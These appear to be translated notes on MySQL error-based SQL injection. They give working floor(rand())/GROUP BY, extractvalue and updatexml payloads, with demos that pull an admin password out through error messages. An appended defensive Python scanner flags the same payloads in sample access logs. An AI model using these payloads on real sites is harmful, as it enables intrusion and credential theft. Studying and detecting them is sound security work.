Some old notes. When MySQL executes a statement it throws an error message, and PHP+MySQL sites often display that error on the page, so specific data can be obtained by constructing the following three methods.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()
The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First, run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is leaked in the error message. To retrieve other data, replace the expression at the position of version() with the desired subquery.
For example, to retrieve the administrator's username and password:
Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
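As an added defensive example (not part of the original notes), the Python below scans web-server access-log lines for the three error-based primitives shown above (floor(rand()) combined with GROUP BY, extractvalue(), updatexml()) and checks a response body for the leaked MySQL error strings a page would echo. The log lines, client IPs and paths are constructed sample data; only the three payloads are the ones from these notes.

```python
import re
from urllib.parse import unquote_plus

# Each technique is recognised when ALL of its patterns occur in the
# URL-decoded, lower-cased request path (order-independent, so both
# floor() payload shapes from the notes above are caught).
SIGNATURES = {
    "floor_rand_groupby": [r"floor\s*\(\s*rand\s*\(", r"group\s+by"],
    "extractvalue": [r"extractvalue\s*\("],
    "updatexml": [r"updatexml\s*\("],
}

# MySQL error text that a page echoing the database error would leak in
# its response body; its presence confirms the injection produced output.
LEAKED_ERROR = re.compile(
    r"Duplicate entry '.*' for key 'group_key'|XPATH syntax error:")

def classify_request(raw_path):
    """Return the names of the error-based techniques found in one path."""
    decoded = unquote_plus(raw_path).lower()
    return [name for name, pats in SIGNATURES.items()
            if all(re.search(p, decoded) for p in pats)]

def leaked_mysql_error(response_body):
    """True if a response body carries one of the tell-tale error strings."""
    return LEAKED_ERROR.search(response_body) is not None

def scan_access_log(lines):
    """Yield (client_ip, path, techniques) for each matching request line."""
    for line in lines:
        parts = line.split('"')
        if len(parts) < 3:
            continue                       # not a combined-format line
        request = parts[1].split(" ")      # e.g. GET /a.php?id=1 HTTP/1.1
        path = request[1] if len(request) > 1 else ""
        hits = classify_request(path)
        if hits:
            yield line.split(" ", 1)[0], path, hits

# Constructed sample log lines (not real traffic); the three payloads are
# the ones shown in the notes above, URL-encoded as a browser would send them.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 231',
    '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 198',
    '198.51.100.9 - - [10/Oct/2023:13:56:07 +0000] "GET /article.php?id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20user()),0x5e24),1)) HTTP/1.1" 500 201',
]

if __name__ == "__main__":
    for ip, path, hits in scan_access_log(SAMPLE_LOG):
        print(ip, hits, path[:60])
```

Both checks together give a defender a low-noise signal: the request-side match says the primitive was attempted, and the leaked error string in the response says the page actually disclosed data.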
Thanks to all, and to the foreign guys.